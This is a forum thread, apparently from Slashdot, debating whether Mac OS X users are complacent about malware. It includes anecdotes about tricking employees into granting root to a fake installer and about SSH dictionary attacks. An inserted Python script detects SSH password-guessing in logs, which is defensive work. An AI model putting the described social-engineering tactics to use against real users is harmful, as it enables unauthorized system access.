I'm not saying that OS X is perfect, I'm saying that SO FAR, you shouldn't waste time and money on virus protection. Do regular backups of your important data, that is MUCH more effective and protects against other disasters like hardware malfunctions, loss and theft, fire and stupidity.
P.S. You don't even know how computers work, do you? What are you doing here? A Mac virus that erases the hard drive? Macs don't even run in root 99% of the time!!!
Ok, going to skip over the bloviating crap, and address a few very important issues.
Just because the USER does not run as root by default on OSX, does not mean that an overflow or other type of exploit could not gain access to protected areas and execute at the root level.
Go read the Apple security bulletins, they actually explain this fairly well even for non-tech people.
Secondly, do you realize how easy it is to get a Mac user to type in the root password when installing software, and giving a trojan full access to the system? This is something our security people actually use to demonstrate the user element in security to companies.
95% of the time, the average Mac Employee gives the fake virus full control when asked to do so, and we issue the root password request very blatantly, when it could be embedded into a series where the user normally expects to give root access to the OS, which increases the % of users that give the virus control of the system at root level.
Thirdly, even if a virus is not running as root, it can still delete everything in your user folders, you know, all the documents you created. This is usually important to users for some strange reason.
As for my knowledge of computers and security, figure that out for yourself...
OS X
If it's such a problem, how come Virus companies haven't been creating viruses on the sly to drum up Mac business?
after RTFA, i can't figure out exactly what the mac user is being told to do other than stop being smug. is it that the firewall should be used and system scanned on occasion? is that it? i know mac users who do that already and yet still feel smug. frankly, i don't see how you can ever get mac users to not feel smug until they face a real problem as opposed to a possibility for a problem for which a patch is available prior to it becoming a reality. seems like if people want mac users to not feel smug, they should stop reading /. and work on producing some exploits to prove their case.
Well, while some Mac users ARE pretty smug, I don't feel their faith in OS/X is completely misplaced.
I've been writing code since 1971 and have made money testing security.
As an exercise, I wrote "Plan 9", a UNIX-specific viral application. I turned it loose in a lab containing SCO UNIX, IBM AIX, some Windows machines, a Mac running Finder, a Novell file server, and some NeXT machines. All the systems were on the same subnet and had NFS mounts to each other.
Without specifics (and don't ask...I won't say), the virus was designed to disable login capability...a basic, but effective denial of service attack.
The SCO and IBM machines were toasted. Everything else was unaffected. Now, the NeXT boxes are NOT identical to today's Mac OS, but similar.
I haven't dissected OS/X (yet), but I would guess it's not an easy target. Could someone write code that would rape and pillage a Mac? Absolutely...nothing is bulletproof. But, some things are easier....like Windows...so the Mac community may have some justification in feeling more secure.
FWIW........
I am my own gestalt.
What Bill Thompson fails to point out is any kind of real solution. Virus scanners are mostly reactionary. They scan computers for known virus signatures. Without any known viruses, there's nothing to scan for. What the hell do we do? Even if every Mac user ran a virus scanner, there wouldn't be any "herd immunity", because any virus that comes on the scene will be entirely new.
I think the answer for lack of mac viruses is quite simple. Besides the fact that 95% of the world uses windows, mac users love their computers too much to want to write viruses for it. If anything, they would be writing windows viruses to try to convert windows users to mac. I mean seriously...on average, the mac community is more dedicated than the christian community. I have never met an apple user who hasn't actively tried to convert me.
Of course this leads to the larger question...are Macs safe? I don't really think so. It's safer than windows right now for sure, but I am interested to see the comparison against Windows Vista.
My brother has an older iMac with five user accounts on it, so if one user gets a virus then only 20% of the user data is at immediate risk (no one in the house knows the admin password - that's my job as family IT guy).
So, in this case, not having admin privileges reduces the damage by 80%. Is that not "substantial"?
TWW
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
I've used Macs since 1986 and I think we are far too smug about virus, trojans and other malware. We think that we are invulnerable, and someone is going to write up a nasty little piece of software that's gonna get us. No doubt about it, and it could even be today. Who knows? There are a number of proprietary antivirus packages (Virex, etc) but there is also a free tool- clamXav which has a Cocoa wrapper around the clamav package. It's not fully integrated yet, e.g., AFAIK you can't automatically pipe e-mail through it from Mail.app, but it's a start.
I already said this in reply to another post, but I'll say it again: OS X is not "obscure". The core OS is open source software (called Darwin) that is based on decades-old BSD code. Cocoa, OS X's most important API has been around since the NextStep days. The stuff on top of Darwin has so far never been successfully exploited, and there has to be some reason for that.
Both Windows and Mac users are blissfully ignorant of proper computer security. Just because *you* give a crap about installing your updates in either Windows or Mac doesn't mean the other 99% of the users do.
This is a 100% mac office. Every workstation here is a mac. There is one lousy windows box left, a web server being phased out and replaced with a LAMP solution. Everything else on the server side is either OS X, freeBSD or Ubuntu. Does that mean my users here know about virus scanning and installing patches as soon as they are available?
Hell no!
They still do the same dumb shit that Windows users do in every other company. They:
1. Ignore automated patches.
2. Disable Virus scanner DAT file updates (yes, we run a virus scanner on our macs).
3. Disable Word Macro protection, then whine when they bring a macro virus from home and infect the other 5 idiots that also turned off the macro protection.
4. Keep 500 (no exaggeration here) spreadsheets on their desktop, then don't at least turn on the auto-arrange, so all 500 spreadsheets (About two years worth of work give or take) are now stacked on top of another.
5. Email 100 MB MP3 recordings of teleconferences, then bitch when the mail server dies.
Etcetera.
These people are no smarter or dumber than the windows users that I have had to work with over the last decade.
The only real difference is that they don't get as many crashes as windows users, so whenever something goes wrong they completely freak out and have a panic attack.
Pedro
----
The Insomniac Coder
My operating system to handle the security part without having to download... Another Browser... Anti-virus software... Anti-spyware software... All of which only partially work. It doesn't excuse stupidity but being cautious in what I download...not to mention having Little Snitch...leaves me feeling rather secure. I like not needing an anti-virus program, keeping my updates up to date and I feel pretty good. Overconfidence or just confidence in a good product...not for me to decide.
My dad bought my niece an HP laptop for Christmas. The next day, I was installing some software (Firefox, AdAware) and got a pop up for "cheap mortgages". She was fiddling with it for all of three hours on Christmas day and got spyware.
Yes, I realize that these are anecdotal stories, but they're pretty typical of the experiences most tech people have in their families.
But, as someone posted earlier, if Macs are 5% of the computer market, why aren't 5% of the viruses and spyware on Macs? That would be tens of thousands, not a few dozen.
You have two hands and one brain, so always code twice as much as you think!
Well, I can see Windows users saying the whole problem of running apps under an account other than "Administrator" is actually a very easy one.
3 Easy Steps:
1) Create account named "NotTheAdministrator"
2) Add it to the "Administrators" group.
3) Change all programs running as "Administrator" to run as "NotTheAdministrator"
All the convenience of the existing software without any of it running as Administrator.
I think a user should have the right to expect that he can plug his brand new spiffy computer into the Internet without having it infected with some crap within a matter of minutes. I think a user should have a right to expect that his computer is secure without having to run 5 separate security products on it at all times. I think a user should have a right to expect that he can open an email or web page he hasn't visited before without the fear that his computer might be taken over. I think that if your operating system does not live up to these simple measurements, you have failed as a software company.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Security "professionals" work the same way as insurance salesmen. They prey on your fear of something that could happen. Things could happen with malware on OS X. Things do happen all the time with malware on Windows. There are approx 800,000,000 Windows users apparently, and 30,000,000 OS X users. Is 30,000,000 clueless Mac users not a tempting target for malware writers? What about 30,000,000 smug Mac users? Perhaps they too fear our smugness. Works for me.
Speaking of smug, the author of this article seems only interested in criticizing Mac users and showing off the fact that he knows what "herd mentality" means. If he's really that concerned, would it have killed him to mention a few security tools (e.g. virus checkers, spyware scanners) that might solve the problem of poor security due to smugness? As far as I could tell the only suggestion was "use the built in firewall"... how insightful!
Shipley puts the virus situation in an interesting perspective:
http://wilshipley.com/blog/2005/09/mac-os-x-viruses-put-up-or-shut-up.html
We don't have virus, we're virus free. For now.
I don't think this is the right question. No OS has perfect security, but if you need add-on products to "protect against infection" it's likely that there's something fundamentally flawed with the architecture of the underlying system. Anything that the add-on product can do is something that could and should be done by the underlying system.
The current "state of the art" (or at least, the art that gets all the attention) in virus protection for the "majority" OS involves scanning for patterns of known viruses. But of course, that's a reactive, close-the-barn-door-after-the-cows-have-gone approach. Even if your antivirus software is 100% up to date, there's still a window of vulnerability between the time a new virus is introduced and the time a new detection pattern for your antivirus software becomes available. You could get infected during that window, and the damage and expense that would result (lost data, necessity for complete wipe and reinstall) is just as great as if you had no protection at all. In fact, if you do a system-wide "virus scan" using a conventional antivirus program, and if it detects one that's somehow managed to install itself on your disk, you ought to do a complete wipe and reinstall anyway. No fun.
Yes, as a Mac (and Linux) user, I am smug about security. I'm not necessarily 100% invulnerable, but the immunity I have is based on solid, fundamentally good OS design, not a patchwork of kludges and an unwinnable arms race. And I reject the FA's implication that I'm somehow being lazy or irresponsible by not doing more than this. The notion that security is and must be the ongoing responsibility of the end user is one of several dangerously false ideas which has been foisted on the world by That Other Operating System. Once I've selected a properly-designed product, and as long as I keep it up-to-date with security patches, my job is mostly done. If I and millions of other mere users are supposed to do much more than this, if our security depends on (say) our being vigilant in never clicking on unsafe attachments or on installing and maintaining add-on security products which try to reactively do what the underlying OS can't, then we've got an untenable situation which will never be secure.
I think you would find all three levels of "smug" amongst Mac users, amongst Linux users, and even amongst Windows users, seeing as how we have plenty of issues in the wild that target Microsoft desktops and laptops. OSX is not particularly "good" against malware; it's more like Windows is particularly "bad", and 99% of the Bad Windows is due entirely to Bill's Favorite OS being configured as vulnerable in a default install. This is a problem in the attitude and practice of the OS vendor, not the OS itself.
Were Windows to be more like UNIX, Linux, or OSX in only that one area, we'd all be more secure, and we could all be worrying about more serious vulnerabilities that go beyond attachments, nasty pictures and Active-X agents of doom.
Now, "too smug" about security, I'm not so sure. It definitely depends on who you talk to (and you obviously haven't been talking to any Mac users I've tutored on the subject; they know security is ongoing and requires vigilance on any platform).
Apple themselves are, and always have been, very reluctant to suggest Macs are immune to malware, and even with Windows nearing 100K in virus/worm/trojan instances, they are remarkably silent about what many feel is a significant competitive advantage. OS9 was (and still is) a much more secure OS than OSX; it may well be amongst the most secure ever widely deployed by anyone. Yet, that would be news to a majority of users on any platform, including OS9 users themselves.
Are men "too smug" about Breast Cancer? Certainly they don't "worry" about it, but they too can be victims (not sure about the actual instances, but perhaps 1-10 ratio would be in the ballpark. You could look it up if it's important to you). Yet, it's not on top of their radar, and I don't think you should be insisting that's somehow wrong. There are other things to worry about, plain and simple.
How many copies of Mac AntiVirus software get sold? By the parent post, it should be none, since the smug would obviously prefer to spend their money on further whitening of their annoyingly bright smiles. Yet, it's widely deployed on home computers (not just corporate boxes) running OSX. I don't know about you, but putting out $50 for what the smug would find to be useless software doesn't jive with the assertion. I also find it hard to believe that Windows users would voluntarily deploy any software at all that cost them money to protect Linux, UNIX or Mac users were the shoe on the other foot.
I wonder if all this smugness is related to former Windows users or to people actually comparing the two platforms while shopping and who chose a different path than they otherwise would have a few years ago? If Linux boxes were available to average consumers (a real problem, still not addressed) would Linux geeks be outnumbered by clueless Linux Lusers, smug about security?
Back in the good ol' days, the Macintosh had notorious security problems. Its habit of "opening" every floppy you stuck in the drive gave it a built-in vector for transmission. Later, with the disastrous port of Word 6.0 to the Macintosh, the Mac was ideal for Macro viruses (.dots masquerading as .docs): they spread just like on the PCs, except that many Mac users were trained (as, alas Windows users are now) not to recognize the distinction between data files and executables, let alone the distinctions among data file types. In addition, the excellent AppleTalk network software made it so easy to share hard drive contents that, once a Word macro got on one Macintosh, it spread to all the others. Heck, back in the day, I remember when network-connected Macintoshes were dubbed "Hackintoshes" and were the vector of choice for, uh, "penetration testing."
You'll recognize that these security weaknesses often come about by the fact that Macintoshes have historically been ahead of PCs in implementation of new technologies and interfaces. Just because a machine blocks many of the common vectors of today doesn't mean it's immune from the unknown. Being on the leading edge has its price. You can't claim to have a supercomputer in a plastic box and have no problems with viruses.
Besides, with the latest generation of security problems, criminal intent has replaced simple malice. What better target for a group of identity thieves than the demographic of Mac users? Come on, if anything is gonna save Mac's market share it's that people are willing to pay a premium for style and simplicity. Mac showed the way for widescale adoption of the PC as a home appliance by playing to the average user's ignorance of how a computer works; Windows has made great strides in this direction, but Apple still has the rep. What better target for your phishing/identity theft/ddos racket than someone who has disposable income, does not know much about computers, and thinks they're immune from such attacks?
As for Linux and Open Source, I'm a big fan of the F/OSS movement, but there seem to be a few misconceptions that get bandied around as fact. For example, when people think F/OSS, they think of code-obsessed geeks working for free in their parents' basement. The best F/OSS projects involve people who are employed specifically to work on them. Another myth, however, is this "many eyes make light work" notion of security. Any project needs coherent centralized direction (some forks are better than others). That means it needs a filtration system for the centralized direction to determine what needs to be done, and to assign people to do it. The more inclusive the filtration system, the more centralized resources get used on community handling, and the less on improving the code base. You can argue that the results are fairly good, but the same is true of Microsoft in the last year or so.
The real way to security, as the Mac people will point out, is a secure design coupled with a flexible and rapid support system. Macs may have the most secure design, but support of their platforms in plugging security holes, or even supporting products more than a year old, has not been stellar: anyone remember that Macintosh wireless spoofing vulnerability from a few years back? For that matter, anyone know anybody who still uses OS X 10.1? Linux, just because it's open and the holes are patched quickly, doesn't by that reason have a super-secure design. There are plenty of reasons why you can prefer your OS to Windows, and there's no disputing that historically, Microsoft seems to have made every "bad choice" regarding security in Windows (and Office) imaginable. But just because Microsoft sucks doesn't make your platform safe. Ignorance and pride are a dangerous combination.
For the record, I've had a PC for over 13 years, and the only infection I ever caught was a Word Macro from a Mac -- and that was easily recognized and disposed of.
"No, Mac users aren't invulnerable. We're simply more secure overall. And we're proud of that."
This may very well be true, and I will bet it is.
Regardless, how do you prove it? There aren't that many people in the world with a combination of the 1) knowledge and 2) 'evilness' to create a virus for millions of computers.
What reason would these few people have to make one for an OS with around 2% market share? Why would they spend the amount of time to find a vulnerability and create a method of transportation?
The fact is Windows is more secure than we all think, and OSX is less. When you are the big dog with 97+% market share on the desktop you have a huge target on your back.
Our legendary humbleness. :-)
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I was a sales rep at a smallish computer store. I told a customer that Macs aren't immune to everything, which is why Symantec (amongst others) releases security tools. The customer argued with me, saying Symantec was just trying to squeeze another buck out of people because their product does nothing. I briefly tried to explain the other risks, and how they differ from viruses - but he would have none of it. Practically spitting mad, he stormed out of the store. The customer went back to the local Mac Users Group, and the whole town was aflame with my store's "hater" stance and how we were a big bunch of liars. All the other stores would advertise "the truth about macs" and pretty much rubbing salt in our wounds. How did my store deal with the situation? We sent a mac expert out to the M.U.G. to explain how we were mistaken, and I was fired. My store lost a lot of customers, apparently.
I think I speak for many Mac users in saying that our smugness (which is never really a good thing) is derived from how much easier it is to be a Mac user these days in the face of all the Windows security threats. It's reinforced, too, by a deeper confusion regarding why so many people feel like they *have* to use Windows. I'm secure in recommending Macs as a more secure alternative - not because I believe that Macs are inherently immune to attack, but because today's reality is that they're at much lower risk, and no matter how much I plead with my friends and relatives they're not diligent about security.
And that's the real problem. I take security measures with my Mac. But many people don't want to learn about or take the time to implement security measures. Windows security would be a whole lot better if every Windows user upgraded to XP SP2, turned on Automatic Updates, and installed a firewall. Add anti-spyware, anti-virus, and a non-admin account and things look even better. Mac and Linux users, at the very least, should have firewalls and should be careful about what they download and run. But by and large, people don't want to bother. And given that, a system that (a) gets fewer attacks and (b) comes configured without root privileges seems like a clear winner to me.
The longer-term challenge is how to manufacture computers that are secure enough out of the box to survive without user intervention...because most users won't take the time.
With Mac users so nauseatingly smug, so herd-vulnerable, and with Linux users (that's me) so superior, so ill-advisedly self-confident, why is it that virus writers don't find us an irresistible target to take down?
[irony]
C'mon virus writers and hackers, what's holding you back? We're missing the fun! I'm missing those pop-up adverts every time I move the cursor! Are we too hard to write viruses for? Is it that I've got everything backed up on tape? Is it because I'm behind a separate firewall machine? I'll give you a clue, it's running Smoothwall : isn't that a challenge to respond to?
We need a control experiment - a fair share of OS X and Linux viruses to see what the infection rates are in a level trial against Windows. Perhaps that will put an end to these arguments.
[/irony]
Right you are. Saying that hackers target windows because of its market share IS sticking your head in the sand. In my opinion, OSX is a bigger target than windows because writing viruses is about fame. Who's going to be more famous, the guy who writes exploit #72,587 for windows or the guy who writes the FIRST exploit for OSX?
Kiteboarding Gear Mention slashdot and get 10% off!
I'd say Mac users are def. too smug about security, and it's only a matter of time till that smugness is taken advantage of. But for now, it works. You see, what I haven't been able to get is why there aren't any significant virus threats for Macs. Just as there are fanatics for Macs, I've seen people _HATE_ Macs and all that use them with a passion second only to their passion for living. How these people haven't created viruses for Macs is beyond me (Harder to spread since Windows would be a brick wall if it were a worm, but still worth a try, maybe a bi-OS virus?). It can't be that every good virus maker is a Mac fan. I think OS X has a built in Firewall, but for now, I think I'll be fine not using a virus scanner like much of the rest of the Mac community (I feel like I just admitted my kryptonite....).
In undeveloped countries, the consumer controls the market. In capitalist America, the market controls you.
There are numerous anti virus programs out there for the Mac, but what virus are they scanning for? There are no known viruses for OS X, so how can they update the virus definitions if they have nothing to base it on? They've seen a vulnerability here and there, but nothing has been exploited yet.
First of all, I find that a pretty funny problem to have... the loneliest virus scanner on the planet, just waiting for the first definition to appear on an update (pretty much all virus products auto-update).
Beyond that, virus programs can still check for types of attacks (like "hey, this program is trying to access your startup items or an application bundle"). Also there are a few things to look for - Word Macro viruses. Some of these can still function partially on a Mac depending on what they do.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I've seen this problem on our university's campus more than a half dozen times (oh, the horror!).
-User reads something about "SSH" to access his machine.
-User turns on SSH
-User also has no imagination with password--uses common dictionary spellings
-User is cracked into with dictionary attack
-Security team shuts down port or blocks MAC after a bank calls to report attacks
-User calls helpdesk
-Consultant re-installs MacOS X and smacks the user about the head and shoulders because they had no business enabling SSH
-User has admin privileges stripped
-Problem solved--for now.
So, the biggest "problem" is, indeed, user ignorance. But, out of the box, I'd say Macs are in pretty good shape against attacks and malware given the current lack (and history) of Mac spyware, trojans, or viruses (none that I know of).
Macs are not impervious, but they enjoy 2 major benefits:
1) There aren't enough of them for a worm to spread quickly or effectively (which is what I'd want if I were in the black arts).
2) They don't come with giant holes from the complacent company who wrote the OS--why work when you can pick the low-hanging fruit from MS?
With the new Intel chips, executables might find new life in the Mac...but we'll see.
I might know what I'm talkin' about, but then again, this is Slashdot...
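The sequence in the comment above (SSH switched on, a dictionary-word password, a dictionary attack that eventually gets in) leaves a recognizable trace in the sshd log. As an added example that is not part of the original thread, this Python check flags a source address whose password login succeeds after a run of failures; the log lines are constructed, and the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH sshd syslog format; addresses are from the
# documentation ranges and the host/account names are made up.
SAMPLE_LOG = """\
Jan 10 03:14:01 g5 sshd[411]: Failed password for invalid user admin from 203.0.113.7 port 40112 ssh2
Jan 10 03:14:03 g5 sshd[413]: Failed password for root from 203.0.113.7 port 40118 ssh2
Jan 10 03:14:05 g5 sshd[415]: Failed password for invalid user test from 203.0.113.7 port 40125 ssh2
Jan 10 03:14:07 g5 sshd[417]: Failed password for invalid user guest from 203.0.113.7 port 40131 ssh2
Jan 10 03:14:09 g5 sshd[419]: Failed password for jsmith from 203.0.113.7 port 40140 ssh2
Jan 10 03:14:11 g5 sshd[421]: Failed password for jsmith from 203.0.113.7 port 40147 ssh2
Jan 10 08:30:12 g5 sshd[530]: Failed password for jsmith from 198.51.100.20 port 51200 ssh2
Jan 10 08:30:20 g5 sshd[530]: Accepted password for jsmith from 198.51.100.20 port 51200 ssh2
Jan 10 09:02:44 g5 sshd[612]: Accepted password for jsmith from 203.0.113.7 port 40390 ssh2
"""

FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted password for (\S+) from (\S+) port \d+")


def analyze(log_text, min_failures=5):
    """Return (guessing_sources, likely_compromises).

    guessing_sources: addresses with at least min_failures failed passwords.
    likely_compromises: password logins accepted from an address that had
    already reached that failure count, i.e. the guess that worked.
    """
    failures = defaultdict(int)   # source address -> failed password count
    tried = defaultdict(set)      # source address -> usernames attempted
    compromises = []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            tried[ip].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            # One mistyped password before a success is normal; a success
            # after many failures across several names is not.
            if failures[ip] >= min_failures:
                compromises.append({
                    "ip": ip,
                    "account": user,
                    "failures_before": failures[ip],
                    "usernames_tried": len(tried[ip]),
                })
    guessing = sorted(ip for ip, n in failures.items() if n >= min_failures)
    return guessing, compromises


if __name__ == "__main__":
    sources, hits = analyze(SAMPLE_LOG)
    print("password-guessing sources:", sources)
    for hit in hits:
        print("accepted login after guessing:", hit)
```

An account that shows up in the second list should have its password reset and the host treated as compromised, which is the reinstall step the comment describes.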
The backup computer for our UW Quantum System Engineering Group is a Mac G5. It was suborned and used to attack NASA computers. As a result, the FBI subpoenaed the entire contents of the computer (Agents came by and cloned the entire disk at the digital level, and yes, we verified their credentials.).
In response to this, our QSE Group decided that we would run a completely open research group. This makes it much simpler for both attackers and friends to learn what we're up to: just go to http://www.mrfm.org/ .
Until you hire a 24-hour security guard, and have no physical connection of your computer to the outside world whatsoever, you are not secure against a determined, professional attack.
More broadly, we tell entering students that if you want to keep a secret, don't tell anyone, don't write it down, and definitely don't store it on a computer. As the FBI agent told us: that's the only security plan that's guaranteed to work and affordable by anyone.
Yup, I'm sitting fat, dumb and happy about the absence of ANY recorded infections of Mac OS X systems.
But what's significant here is to understand the vulnerabilities of Mac OS X. What's pretty clear is that the vulnerabilities that permeate Microsoft products aren't in Mac OS X.
Part of the reason I'm not rushing out to buy Mac antivirus software is that I'm not convinced it's worth the money. I'd assert it's guarding against sources of infections that so far haven't proven out. When there is an actual Mac OS X virus/worm/malware/etc, we'll be able to understand that real, no-sh*t vulnerability and I'll be happy to buy a product that is proven effective against it.
So to those who want me to buy Mac OS anti-virus products, I'd argue two things, which are the classic requirements that the FDA places on medicines:
1. Safe - Many of the Mac OS X products have proven to be much more harmful to overall system reliability, and I don't need some anti-virus software protecting me against malware/virus behavior, by causing the same symptoms of system instability.
2. Effective - Against some clearly validated threat, not hypothetical risks based on vulnerabilities of other platforms.
In some respects, it's like taking medicine against TB, -after- you've been vaccinated against TB. Your chances of catching TB are nil without the medicine, and that medicine won't protect you against some other kind of disease, so why bother with the medicine?
dave
On Linux and I guess the Mac you don't have to run as root all the time. I know that you can run a Windows box without admin rights but it is a real pain. So far on Windows I have yet to find anything like su or sudo. On a Linux box if I have to have root it is so simple to do an su, do what I need to do, and then exit.
On windows I have to log off and then log in with admin rights. Not running as an admin makes your system less vulnerable.
That being said I have never had my Windows machines get infected with a virus or worm. I do run them behind Linux firewalls, I don't use Outlook, I do use Firefox, and I don't open strange attachments.
See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
The fact that OS X/*nix is more secure than Windows due to its smaller user base is just a myth!
Look at web servers for example, the number of Apache boxes out there far outweighs the number of IIS servers, yet there are plenty of IIS viruses whereas there has been 1(?) Apache virus (which was a vulnerability in a module - not actually Apache). If it was simply a case of going for the largest user base why aren't there more Apache viruses than IIS viruses?
Haydn.
Time is an illusion. Lunchtime doubly so. - Douglas Adams
Because most weren't critical vulnerabilities and there are no exploits. Show me an exploit for a Mac OS X vulnerability. Now, show me one in the wild. Can't? The only thing you have to do to wipe the smug look off a Mac user's face is to release an exploit into the wild.
I actually don't have to do anything that hasn't already been done...
Here is my 2 minute search for a response to your questions specifically.
Proof of concept exploit:
http://news.zdnet.com/2100-3513_22-5189335.html?tag=zdfd.newsfeed
Exploit, infections from not known:
http://news.zdnet.co.uk/internet/security/0,39020375,39155837,00.htm
In Wild exploit, known infections:
http://www.macintouch.com/opener.html
I don't have time to do more research to help your denial, but I would suggest you actually do a bit of research yourself and see that OSX is no more perfect than any other OS. PERIOD.
Do hackers have Macs and software to run on them? Maybe not enough yet. But what about when Intel Macs ship........
Apple has quite a few things going for it in regards to security, which is why we've seen no wild viruses yet:
1) Real user accounts with limited system permissions. Makes it harder for viruses to really worm into the system.
2) No services open by default so there's really no good vector for automatic intrusion - whatever service you pick is going to have a low payback.
But really a very important, and often overlooked feature is (3) - a system updater that people do not disable, because it's not very intrusive.
That is what gives Macs a tremendous immunity advantage as a group, because if any attack vectors are found (either through Safari or services or what have you) Apple can have 90% of the Macs on the planet patched within a week (being really conservative there and assuming that 10% of macs either would have update disabled or otherwise are unable to update for some time for some reason). So even a serious spyware problem that entered through Safari (my bet for the first successful attack we would see) would be patched before many people would get hit.
In theory Windows Update could do the same for Windows - but in reality a lot of people disable it as it keeps breaking things or is just plain in the way.
So the reason that Macs have no viruses yet is not because the marketshare is too small (point me to any spammer that would just toss aside a few million zombies if they could use 'em), but because like the borg shield any vulnerabilities are constantly shifting and thus not exploitable for long enough to make the attempt worthwhile.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Bill Thompson: Mac users really shouldn't get complacent, and should use decent security measures.
Slashdot: Kind of hard to install security measures for problems which don't exist, Bill.
No kidding!!! What do you say at this point?
These posts are common, I've been reading them on Slashdot, Ars Technica, my newspaper and tech sites around the internet. They usually are initiated by virus vendors trying to be professional (not sell their product noooo...) and warn us of the potential dangers.
I'm actually pretty sure there are more articles about the fact that MacOSX can be prone to malware than there is malware on the Mac. As a matter of fact, no malware on the Mac yet (MacOSX, classic MacOS had a few prior to os8).
None
Zero
Zilch
There was this "proof of concept" once... you had to download an mp3, which in fact was an executable archive, you had to double-click it in the finder, which almost no one does (drag and drop on app in dock usually), then it would execute (which no mp3 does, you have to be a moron not to be suspicious at that point) and then your MacOS was asking for permission to run the process (cause it was targeting a system component), then at this point, you have to be VERY stupid to write your password in the window and click yes. That was what is considered "proof of concept" on the mac...
A bit more? What are you smoking?
Mod me down. I've got karma to burn.
Talk about being smug....
With the first link, the chain is forged.
Name one.
C'mon. You just spent a lot of time telling us that there are a lot of viruses out there for OS X and that we should just research it. Well, I'm sure you've researched it, so enlighten us, please. Name one.
Oh, I know about the "opener" trojan. A shell script that never went anywhere. BTW here is a much more destructive "Mac OS X trojan" called "runme.sh" that also affects Linux and Unix! Oh my. Here it is, read with caution:
The only viruses I've seen on macs are word macro viruses - namely Claude.A
So, oh wise one, educate me and the rest of us please. I am aware that there are security weaknesses which could be exploited. But so far, none have. I agree, that we have to be vigilant, but for now, you are just talking out of your ass.
"terrorism" and "pedophilia" are the root passwords to the Constitution
A bit more? What are you smoking?
Apparently not the good stuff... *smile*
Perhaps I am resistant, or not prone to the behavior that made you sick.
This is like people who claim that everyone gets AIDS, not just gay men and IV drug users...
I suggest you read Slashdot
OK, let's say that you have a virus. Now, it is visible in your data so you restore them from backup. If it is also possible that the programs you use (that you say is not as valuable as the OS) could be infected, well your data files could get re-infected. So you re-install your data from backup. And it gets re-infected....
See where this is going yet?
If you trash your data (whether it is backed up or not) with a virus, you want to KNOW that your system can be trusted not to put the virus back in. UNIX and the user/admin separation makes this possible. Windows admin rights being widely necessary means that you cannot.
So your own data being trashed may be more damaging for that one instance than the OS being trashed, but if you don't want to have your data re-infected, you will need to reinstall your OS too.
Apple has done a very good job at fixing their specific errors and security issues for MacOS X, but additionally since they are building off an open-source software base they inherit any security problems from all the underlying applications that run on their system. But even so they have been good at contributing to fixes for those projects, and good at packaging fixes for MacOS X once those projects post a fix for their problems.
So...should the average MacOS X user be concerned about security problems? Sure, and they should make an effort to acknowledge fixes that happen in Software Update. Should they worry about worms and malware? Of course, though there are only a handful of those and they mostly require superuser access to run. Should they be concerned with viruses? What...for the proofs-of-concept not actually in the wild? Not really.
In comparison to the numbers of unpatched Windows security errors, thousands of worms and malware for Windows, and thousands of viruses for Windows...and all the paranoia that generates (rightfully!) in Windows users? Any non-Windows user, not just the MacOS X ones, have some right to be 'smug'.
At the risk of repeating myself, on this subject, I recently answered a query raised during a Chronicle of Higher Education colloquy. I believe it touches on the major issues here.
Question from Lisa L. Spangenberg, UCLA:
Given that there are no viruses or Trojan horses for the current Macintosh system, OS X 10.3, and given that it is essentially UNIX, and given that the most common applications (Microsoft Office Suite, Adobe applications) work very well on OS X, why don't more institutions adopt Macs and encourage faculty to use them?
Gregory A. Jackson:
Well, first of all, there are viruses and Trojans that afflict MacOS, witness Apple's periodic release of security fixes to counteract them.
First, that isn't true, regarding viruses. To date, there are no known viruses that specifically target Mac OS X. Last week's "trojan" was nothing more than an application with a different icon and misleading name that displayed a dialog box (which was an example posted to a USENET Mac programming group to illustrate this fact that has been known and possible on Mac OS for over twenty years; an antivirus vendor apparently thought this an appropriate time to dress it up, incorrectly, as some new, terrible exploit easily adapted for malicious means, when in reality it's nothing more than an application).
If you're referring more broadly to security issues in general, almost all of the security and security-related updates for Mac OS X to date have been updates for primarily server-type services that ship with the OS, all of which are disabled by default, and the lion's share of which are never even enabled, much less touched, on the vast majority of systems. I'm not saying that they should be ignored, but Apple's comprehensive and swift response to the most minor security issues does not rise to the level of the staggeringly numerous, sometimes completely automated, remote exploits, worms, and so on for Windows. It is no longer possible to even get through a full installation Windows XP on a machine connected to a public network without it being exploited before you even have a chance to patch it.
It's definitely possible for Mac OS X to have viruses, worms, trojans, and other malware - Mac OS X is not invulnerable, and no sensible person would claim it to be. But the underlying philosophical design principles are fundamentally more secure than Windows, period. Since the major ingredient for the success of a worm or virus is some ability to spread, witness the fact that there is no way with anything built into Mac OS X to perform automated propagation of a virus, and no current known ways to exploit a machine remotely, not to mention that potentially exploitable network services are disabled to begin with anyway (and remain that way unless explicitly enabled), a stark contrast to Windows. Any hope for automatic propagation would require a comparatively high level of sophistication, and perhaps even its own mail server - not to mention some intrinsic vulnerability to exploit. On the other hand, there are still, to this moment, unfixed vulnerabilities in certain versions of Outlook that will spread certain virus variants simply by previewing a message, and nothing more. There is simply no equivalent to this on any other platform. Microsoft's track record and attitude on security (though admittedly much improved) versus other vendors speaks volumes on this topic.
It takes work and thought to do security, and do it right. Ease of use and security aren't mutually exclusive. The key is to make security easy to use, and Apple has so far been on the right road with Mac OS X.
But the small installed base of Macs makes them an unexciting, low-visibility target for the bad guys, and so the weaknesses don't get exploited much.
The marketshare argument only goes so far. This seems to be a version of the "Macs have no software" argument. It is indeed true
There is an anti-spyware product for the Mac OS world called "MacScan". I interviewed the President and COO of SecureMac, the developers, on the last edition of Radio MacGuys
http://www.macguys.com/
wherever I go, there I am.
So, in this case, not having admin privileges reduces the damage by 80%. Is that not "substantial"?
